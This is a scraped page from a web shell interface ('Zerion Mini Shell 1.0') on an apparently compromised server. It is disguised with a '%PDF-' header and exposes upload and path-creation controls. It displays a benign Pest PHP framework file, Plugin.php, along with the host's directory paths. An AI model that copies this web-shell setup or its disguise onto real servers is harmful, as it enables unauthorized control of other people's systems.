%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/vacivi36/vittasync.vacivitta.com.br/vittasync/vendor/pestphp/pest/src/
Upload File :
Create Path :
Current File : /home/vacivi36/vittasync.vacivitta.com.br/vittasync/vendor/pestphp/pest/src/Plugin.php

<?php

declare(strict_types=1);

namespace Pest;

final class Plugin
{
    /**
     * The lazy callables to be executed once the test suite boots.
     *
     * @var array<int, callable>
     *
     * @internal
     */
    public static array $callables = [];

    /**
     * Lazy loads an `uses` call on the context of plugins.
     *
     * @param  class-string  ...$traits
     */
    public static function uses(string ...$traits): void
    {
        self::$callables[] = function () use ($traits): void {
            uses(...$traits)->in(TestSuite::getInstance()->rootPath);
        };
    }
}

Zerion Mini Shell 1.0